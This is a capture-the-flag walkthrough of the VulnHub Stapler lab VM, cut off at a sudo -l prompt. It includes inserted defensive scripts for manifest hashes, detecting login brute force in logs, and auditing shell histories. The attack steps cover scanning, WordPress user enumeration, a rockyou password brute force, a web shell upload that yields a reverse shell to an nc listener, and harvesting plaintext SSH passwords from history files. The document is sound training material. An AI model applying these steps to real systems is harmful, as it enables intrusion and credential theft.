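# Lab setup

Download: https://download.vulnhub.com/stapler/Stapler.zip

Importing the ovf file into VMware directly fails, because its internal data structure has been altered and has to be re-sorted in Unicode alphabetical order. The sorted content is below; use it to overwrite the original file.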

<?xml version="1.0" encoding="UTF-8"?>
<!--Generated by VMware ovftool 4.1.0 (build-3018522), UTC time: 2016-06-07T10:02:55.518806Z-->
<Envelope vmw:buildId="build-3018522" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Stapler-disk1.vmdk" ovf:id="file1" ovf:size="757926912"/>
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="20" ovf:capacityAllocationUnits="byte * 2^30" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" ovf:populatedSize="2212560896"/>
  </DiskSection>
  <NetworkSection>
    <Info>The list of logical networks</Info>
    <Network ovf:name="hostonly">
      <Description>The hostonly network</Description>
    </Network>
  </NetworkSection>
  <VirtualSystem ovf:id="vm">
    <Info>A virtual machine</Info>
    <Name>Stapler</Name>
    <OperatingSystemSection ovf:id="93" vmw:osType="ubuntuGuest">
      <Info>The kind of installed guest operating system</Info>
    </OperatingSystemSection>
    <VirtualHardwareSection>
      <Info>Virtual hardware requirements</Info>
      <System>
        <vssd:Caption>Virtual Hardware Family</vssd:Caption>
        <vssd:InstanceID>0</vssd:InstanceID>
        <vssd:VirtualSystemIdentifier>Stapler</vssd:VirtualSystemIdentifier>
        <vssd:VirtualSystemType>vmx-15</vssd:VirtualSystemType>
      </System>
      <Item>
        <rasd:AllocationUnits>hertz * 10^6</rasd:AllocationUnits>
        <rasd:Caption>1 virtual CPU(s)</rasd:Caption>
        <rasd:Description>Number of Virtual CPUs</rasd:Description>
        <rasd:InstanceID>1</rasd:InstanceID>
        <rasd:ResourceType>3</rasd:ResourceType>
        <rasd:VirtualQuantity>1</rasd:VirtualQuantity>
      </Item>
      <Item>
        <rasd:AllocationUnits>byte * 2^20</rasd:AllocationUnits>
        <rasd:Caption>1024MB of memory</rasd:Caption>
        <rasd:Description>Memory Size</rasd:Description>
        <rasd:InstanceID>2</rasd:InstanceID>
        <rasd:ResourceType>4</rasd:ResourceType>
        <rasd:VirtualQuantity>1024</rasd:VirtualQuantity>
      </Item>
      <Item>
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>sataController0</rasd:Caption>
        <rasd:Description>SATA Controller</rasd:Description>
        <rasd:InstanceID>3</rasd:InstanceID>
        <rasd:ResourceSubType>AHCI</rasd:ResourceSubType>
        <rasd:ResourceType>20</rasd:ResourceType>
      </Item>
      <Item ovf:required="false">
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>usb</rasd:Caption>
        <rasd:Description>USB Controller (EHCI)</rasd:Description>
        <rasd:InstanceID>4</rasd:InstanceID>
        <rasd:ResourceSubType>vmware.usb.ehci</rasd:ResourceSubType>
        <rasd:ResourceType>23</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="ehciEnabled" vmw:value="true"/>
      </Item>
      <Item>
        <rasd:Address>0</rasd:Address>
        <rasd:Caption>scsiController0</rasd:Caption>
        <rasd:Description>SCSI Controller</rasd:Description>
        <rasd:InstanceID>5</rasd:InstanceID>
        <rasd:ResourceSubType>lsilogic</rasd:ResourceSubType>
        <rasd:ResourceType>6</rasd:ResourceType>
      </Item>
      <Item>
        <rasd:AddressOnParent>2</rasd:AddressOnParent>
        <rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>
        <rasd:Caption>ethernet0</rasd:Caption>
        <rasd:Connection>hostonly</rasd:Connection>
        <rasd:Description>PCNet32 ethernet adapter on &quot;hostonly&quot;</rasd:Description>
        <rasd:InstanceID>6</rasd:InstanceID>
        <rasd:ResourceSubType>PCNet32</rasd:ResourceSubType>
        <rasd:ResourceType>10</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
        <vmw:Config ovf:required="false" vmw:key="wakeOnLanEnabled" vmw:value="false"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>video</rasd:Caption>
        <rasd:InstanceID>7</rasd:InstanceID>
        <rasd:ResourceType>24</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="enable3DSupport" vmw:value="false"/>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>vmci</rasd:Caption>
        <rasd:InstanceID>8</rasd:InstanceID>
        <rasd:ResourceSubType>vmware.vmci</rasd:ResourceSubType>
        <rasd:ResourceType>1</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item>
        <rasd:AddressOnParent>0</rasd:AddressOnParent>
        <rasd:Caption>disk0</rasd:Caption>
        <rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>
        <rasd:InstanceID>9</rasd:InstanceID>
        <rasd:Parent>3</rasd:Parent>
        <rasd:ResourceType>17</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <Item ovf:required="false">
        <rasd:AddressOnParent>1</rasd:AddressOnParent>
        <rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
        <rasd:Caption>cdrom0</rasd:Caption>
        <rasd:InstanceID>10</rasd:InstanceID>
        <rasd:Parent>3</rasd:Parent>
        <rasd:ResourceType>15</rasd:ResourceType>
        <vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
      </Item>
      <vmw:Config ovf:required="false" vmw:key="cpuHotAddEnabled" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="memoryHotAddEnabled" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.powerOffType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.resetType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="powerOpInfo.suspendType" vmw:value="soft"/>
      <vmw:Config ovf:required="false" vmw:key="tools.afterPowerOn" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.afterResume" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.beforeGuestShutdown" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.beforeGuestStandby" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.syncTimeWithHost" vmw:value="true"/>
      <vmw:Config ovf:required="false" vmw:key="tools.toolsUpgradePolicy" vmw:value="upgradeAtPowerCycle"/>
    </VirtualHardwareSection>
    <AnnotationSection ovf:required="false">
      <Info>A human-readable annotation</Info>
      <Annotation>--[[~~Enjoy. Have fun. Happy Hacking.~~]]--
+ There are multiple methods to-do this machine: At least
-- Two (2) paths to get a limited shell
-- At least three (3) ways to get a root access</Annotation>
    </AnnotationSection>
  </VirtualSystem>
</Envelope>

After overwriting the original file, update the hash recorded in the mf file: SHA1(Stapler.ovf)= 0737f41d2e522cda052c876ccb1fba6235dbacc5

Then open the ovf file with the virtualization software's Open function.
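The manifest update described above can be scripted rather than edited by hand. This is an added example, not part of the original write-up; the sample OVF bytes and the digests in the sample manifest are constructed stand-ins, and `fix_files` is a hypothetical helper name.

```python
import hashlib
import re
from pathlib import Path

# Manifest line in the form shown above: "SHA1(Stapler.ovf)= <hex digest>"
MF_LINE = re.compile(
    r"^(?P<algo>SHA1|SHA256)\((?P<name>[^)]+)\)\s*=\s*(?P<digest>[0-9a-fA-F]+)\s*$"
)

# Constructed stand-ins so the example runs offline; both digests are dummies.
SAMPLE_OVF = b"<Envelope>constructed stand-in for the edited Stapler.ovf</Envelope>\n"
SAMPLE_MF = f"SHA1(Stapler.ovf)= {'0' * 40}\nSHA1(Stapler-disk1.vmdk)= {'1' * 40}\n"


def digest_of(data, algo):
    """Hex digest of data using the algorithm named in the manifest line."""
    return hashlib.new(algo.lower(), data).hexdigest()


def mismatches(mf_text, files):
    """Names from `files` (name -> bytes) whose recorded digest is stale."""
    bad = []
    for line in mf_text.splitlines():
        m = MF_LINE.match(line)
        if m and m["name"] in files:
            if digest_of(files[m["name"]], m["algo"]) != m["digest"].lower():
                bad.append(m["name"])
    return bad


def refresh_manifest(mf_text, name, data):
    """Return mf_text with the digest for `name` recomputed; other lines untouched."""
    out, found = [], False
    for line in mf_text.splitlines():
        m = MF_LINE.match(line)
        if m and m["name"] == name:
            line = f"{m['algo']}({name})= {digest_of(data, m['algo'])}"
            found = True
        out.append(line)
    if not found:
        raise KeyError(f"{name} is not listed in the manifest")
    return "\n".join(out) + "\n"


def fix_files(mf_path, ovf_path):
    """Rewrite the .mf on disk after the .ovf next to it has been replaced."""
    mf, ovf = Path(mf_path), Path(ovf_path)
    mf.write_text(refresh_manifest(mf.read_text(), ovf.name, ovf.read_bytes()))


if __name__ == "__main__":
    print("stale before:", mismatches(SAMPLE_MF, {"Stapler.ovf": SAMPLE_OVF}))
    fixed = refresh_manifest(SAMPLE_MF, "Stapler.ovf", SAMPLE_OVF)
    print(fixed, end="")
    print("stale after:", mismatches(fixed, {"Stapler.ovf": SAMPLE_OVF}))
```

Once both the OVF and its recorded hash have been edited locally, the manifest only confirms that the two files agree with each other; any check of the download's origin has to be done on Stapler.zip before editing.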

As usual, add a network adapter in NAT mode. IP address: 192.168.74.139

# Information gathering

# nmap

Start with a quick scan of all ports:

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:30 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00032s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 00:0C:29:24:85:D3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds

The quick scan did not identify what is on 12380, so scan it more carefully:

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -sV -p 12380 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:36 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00038s latency).
PORT      STATE SERVICE VERSION
12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:24:85:D3 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds

It turns out to be a web server as well.

Run a vulnerability scan:

nmap 192.168.74.139 --script=vuln

The scan reports smb-vuln-cve2009-3103, but the OS is not Windows. Nothing usable.

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.74.139        
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.74.139/_24-04-08_09-32-20.txt
Target: http://192.168.74.139/
[09:32:20] Starting: 
[09:32:21] 200 -  220B  - /.bash_logout                                     
[09:32:21] 200 -    4KB - /.bashrc                                          
[09:32:26] 200 -  675B  - /.profile                                         
                                                                             
Task Completed

Three shell configuration files. No idea what this box is up to.

# nikto

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.139:12380
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.139
+ Target Hostname:    192.168.74.139
+ Target Port:        12380
+ Start Time:         2024-04-08 09:38:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /c/: This might be interesting.
+ /js: This might be interesting.
+ /CSNews.cgi?command=viewnews&database=none: csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.
+ /ci/: This might be interesting: potential country code (CÔte D'ivoire).
+ /is/: This might be interesting: potential country code (Iceland).
+ /ie/: This might be interesting: potential country code (Ireland).
+ /nu/: This might be interesting: potential country code (Niue).
+ /sb/: This might be interesting: potential country code (Solomon Islands).
+ /gs/: This might be interesting: potential country code (South Georgia And The South Sandwich Islands).
+ /wcadmin/login.aspx: QS/1 Webconnect administration panel.
+ 8115 requests: 14 error(s) and 14 item(s) reported on remote host
+ End Time:           2024-04-08 09:52:01 (GMT-4) (783 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

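Nothing at all, which is odd. I also looked at the web pages and found nothing.

# Information gathering, round two

I could not collect any key information or even find the entry point, so I gathered information again. I suspected the service speaks SSL, so I re-ran the collection against https.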

# dirsearch

┌──(root㉿kali)-[~]
└─# dirsearch -u https://192.168.74.139:12380
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3                                                                            
 (_||| _) (/_(_|| (_| )                                                                                     
                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/https_192.168.74.139_12380/_24-04-08_10-05-28.txt
Target: https://192.168.74.139:12380/
[10:05:28] Starting:                                                                                        
[10:05:35] 403 -  303B  - /.ht_wsr.txt                                      
[10:05:35] 403 -  306B  - /.htaccess.bak1                                   
[10:05:35] 403 -  306B  - /.htaccess_orig                                   
[10:05:35] 403 -  304B  - /.htaccessBAK                                     
[10:05:35] 403 -  308B  - /.htaccess.sample
[10:05:35] 403 -  306B  - /.htaccess.orig
[10:05:35] 403 -  305B  - /.htaccessOLD2
[10:05:35] 403 -  296B  - /.htm
[10:05:35] 403 -  304B  - /.htaccess_sc                                     
[10:05:35] 403 -  307B  - /.htaccess_extra
[10:05:35] 403 -  306B  - /.htaccess.save
[10:05:35] 403 -  297B  - /.html                                            
[10:05:35] 403 -  302B  - /.htpasswds                                       
[10:05:35] 403 -  306B  - /.htpasswd_test                                   
[10:05:35] 403 -  304B  - /.htaccessOLD
[10:05:35] 403 -  303B  - /.httr-oauth
[10:05:37] 403 -  296B  - /.php                                             
[10:05:37] 403 -  297B  - /.php3                                            
[10:06:27] 301 -  331B  - /javascript  ->  https://192.168.74.139:12380/javascript/
[10:06:43] 301 -  331B  - /phpmyadmin  ->  https://192.168.74.139:12380/phpmyadmin/
[10:06:45] 200 -    3KB - /phpmyadmin/doc/html/index.html                   
[10:06:45] 200 -    3KB - /phpmyadmin/                                      
[10:06:45] 200 -    3KB - /phpmyadmin/index.php                             
[10:06:53] 200 -   59B  - /robots.txt                                       
[10:06:56] 403 -  305B  - /server-status                                    
[10:06:56] 403 -  306B  - /server-status/                                   
                                                                             
Task Completed

# nikto

┌──(root㉿kali)-[~]
└─# nikto -h https://192.168.74.139:12380/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.139
+ Target Hostname:    192.168.74.139
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=[email protected]
+ Start Time:         2024-04-08 10:05:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/admin112233/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /blogblog/: IP address found in the 'x-pingback' header. The IP is "192.168.164.128". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/blogblog/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.74.139' does not match certificate's names: Red.Initech. See: https://cwe.mitre.org/data/definitions/297.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8259 requests: 1 error(s) and 15 item(s) reported on remote host
+ End Time:           2024-04-08 10:13:34 (GMT-4) (471 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

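This time there are findings.

Take a look at the blogblog path and admin112233.

They turn out to be a WordPress site and an XSS phishing page.

That makes it clear: this box is about breaking WordPress and phishing with BeEF.

# Summary

  • admin112233 path

  • blogblog path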

  • phpmyadmin

  • wordpress4.2.1

  • Apache/2.4.18

  • Ubuntu

  • wpscan

  • BeEF XSS phishing

  • SSH brute force

  • FTP brute force

  • phpmyadmin

# Exploitation

# wpscan

Scan with wpscan first. A plain scan fails with the error: seems to be down (SSL peer certificate or SSH remote key was not OK)

So disable TLS checks for the scan:

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks

No plugins or themes were found, so the attack surface is fairly narrow. Use an api-token to see how many vulnerabilities are reported:

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks --api-token <MY_KEY>

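Impressive: 118 vulnerabilities, including file upload and SQL injection. Whether any of them actually work, I was a bit too lazy to test.

Try enumerating usernames: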

┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks -e u
[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

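This turns up a number of usernames, which could be used for credential stuffing, but I consider that a last resort and try other approaches first.

All 118 reported vulnerabilities could in fact be tried, but I really did not want to go through them one by one, so more information gathering is needed.

# Brute force

The earlier information gathering turns up the WordPress uploads folder, which contains uploaded plugins. Looking up the plugin names gives vulnerability information that could be used to get a shell. That is a lot of hassle, though, so I just brute-forced the password of a WordPress account instead.

Decompress the commonly used wordlist: gzip -d /usr/share/wordlists/rockyou.txt.gz

Then run the brute force: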

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url https://192.168.74.139:12380/blogblog -P /usr/share/wordlists/rockyou.txt -U john --disable-tls-checks --max-threads 100 --password-attack wp-login

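The brute force ran 180,000 attempts, which is also why this approach is not recommended: it simply takes too long. It produced the credentials john/incorrect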
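Seen from the server side, the author enumeration and the wp-login password attack above leave a clear pattern in the Apache access log. The following detection sketch is an added example, not part of the original write-up; the log lines are constructed, the thresholds are assumptions, and 192.168.74.1 is a made-up benign client.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" log line: client, timestamp, request line, status.
LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
AUTHOR = re.compile(r"[?&]author=(\d+)")


def detect(lines, max_fail=5, window=timedelta(minutes=1), max_authors=3):
    """Return {(client_ip, finding): time of first hit}. Thresholds are assumptions."""
    fails = defaultdict(deque)   # ip -> times of recent failed logins
    authors = defaultdict(set)   # ip -> distinct ?author= ids requested
    alerts = {}
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            recent = fails[ip]
            while recent and ts - recent[0] > window:
                recent.popleft()          # forget failures outside the window
            if status == 200:             # WordPress re-renders the form on failure
                recent.append(ts)
                if len(recent) > max_fail:
                    alerts.setdefault((ip, "wp-login brute force"), ts)
            elif status == 302 and len(recent) > max_fail:   # redirect = success
                alerts.setdefault((ip, "login succeeded after brute force"), ts)
        hit = AUTHOR.search(path)
        if method == "GET" and hit:
            authors[ip].add(int(hit.group(1)))
            if len(authors[ip]) > max_authors:
                alerts.setdefault((ip, "author id enumeration"), ts)
    return alerts


def sample_log():
    """Constructed access-log lines; not captured from the Stapler VM."""
    def row(ip, sec, method, path, status):
        return (f'{ip} - - [08/Apr/2024:10:40:{sec:02d} -0400] '
                f'"{method} {path} HTTP/1.1" {status} 2031 "-" "constructed-agent"')
    scanner, user = "192.168.74.129", "192.168.74.1"
    rows = [row(scanner, i, "GET", f"/blogblog/?author={i}", 301) for i in range(1, 6)]
    rows += [row(scanner, 10 + i, "POST", "/blogblog/wp-login.php", 200) for i in range(8)]
    rows.append(row(scanner, 20, "POST", "/blogblog/wp-login.php", 302))
    rows += [row(user, 30 + i, "POST", "/blogblog/wp-login.php", 200) for i in range(2)]
    rows.append(row(user, 35, "POST", "/blogblog/wp-login.php", 302))
    return rows


if __name__ == "__main__":
    for (ip, finding), first in sorted(detect(sample_log()).items()):
        print(first.isoformat(), ip, finding)
```

The "login succeeded after brute force" finding is the one that needs an immediate password reset and session review, since it marks the moment an account was actually taken over.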

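After logging in, the account turns out to have administrator privileges.

From there, either upload a web shell through the plugin upload, or edit a theme template and write a one-line web shell into it.

I uploaded the shell.php that ships with Kali through the plugin upload.

The nc listener received the reverse shell: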

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.139] 57954
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
 14:49:29 up  2:17,  0 users,  load average: 84.46, 78.24, 48.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Look at every user's shell history: cat /home/*/.bash_history

It shows two sets of account credentials:

sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost

Another entry shows that we do not have permission to read the peter account's history, so it is probably a high-privilege account; we log in to that one.
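The root cause of this step is history files readable by other users combined with passwords passed on the command line. The audit below checks a home tree for both; it is an added example, not part of the original write-up. The pattern list is an assumed starter set, and the sample tree is constructed apart from the JKanode line quoted above.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

HISTORY_NAMES = {".bash_history", ".zsh_history"}
# Commands that take a secret as an argument (an assumed starter set, extend as needed).
SECRET_PATTERNS = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*\S+")),
    ("--password", re.compile(r"--password[= ]\S+")),
    ("mysql -p<pw>", re.compile(r"\bmysql\b.*\s-p\S+")),
]


def audit_histories(home_root):
    """Return (user, file, line_no, issue) findings; line_no 0 means the file itself."""
    findings = []
    for home in sorted(Path(home_root).iterdir()):
        for name in sorted(HISTORY_NAMES):
            hist = home / name
            if not hist.is_file():
                continue
            mode = stat.S_IMODE(hist.stat().st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((home.name, name, 0, f"mode {mode:04o}, expected 0600"))
            try:
                lines = hist.read_text(errors="replace").splitlines()
            except PermissionError:
                continue
            for n, line in enumerate(lines, 1):
                for label, pattern in SECRET_PATTERNS:
                    if pattern.search(line):
                        # Report where the secret is, never echo the secret itself.
                        findings.append((home.name, name, n, f"secret in argv ({label})"))
                        break
    return findings


def build_sample(root):
    """Constructed home tree; only the JKanode sshpass line comes from the page."""
    samples = {
        "JKanode": (0o644, "ls\nsshpass -p thisimypassword ssh JKanode@localhost\n"
                           "apt-get install sshpass\n"),
        "peter": (0o600, "id\nsudo -l\n"),
    }
    for user, (mode, text) in samples.items():
        home = Path(root) / user
        home.mkdir()
        hist = home / ".bash_history"
        hist.write_text(text)
        os.chmod(hist, mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in audit_histories(tmp):
            print(*finding, sep="\t")
```

Any password the audit points to should be rotated, not just removed from the history file.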

Once in, check the sudo privileges; switching straight to root works.

www-data@red:/home$ ssh peter@localhost
ssh peter@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
peter@localhost's password: JZQuyIN5
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q)  Quit and do nothing.  The function will be run again next time.
(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.
(1)  Continue to the main menu.
(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).
--- Type one of the keys in parentheses --- 2
2^J
prompt_adam1_setup:1: scalar parameter prompt_adam1_color1 created globally in function
prompt_adam1_setup:2: scalar parameter prompt_adam1_color2 created globally in function
prompt_adam1_setup:3: scalar parameter prompt_adam1_color3 created globally in function
prompt_adam1_setup:5: scalar parameter base_prompt created globally in function
prompt_adam1_setup:6: scalar parameter post_prompt created globally in function
prompt_adam1_setup:9: scalar parameter base_prompt_no_color created globally in function
prompt_adam1_setup:10: scalar parameter post_prompt_no_color created globally in function
/home/peter/.zshrc:15: scalar parameter HISTFILE created globally in function
(eval):1: scalar parameter LS_COLORS created globally in function
peter@red ~ %                                                                  
peter@red ~ % sudo -l                                                          
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
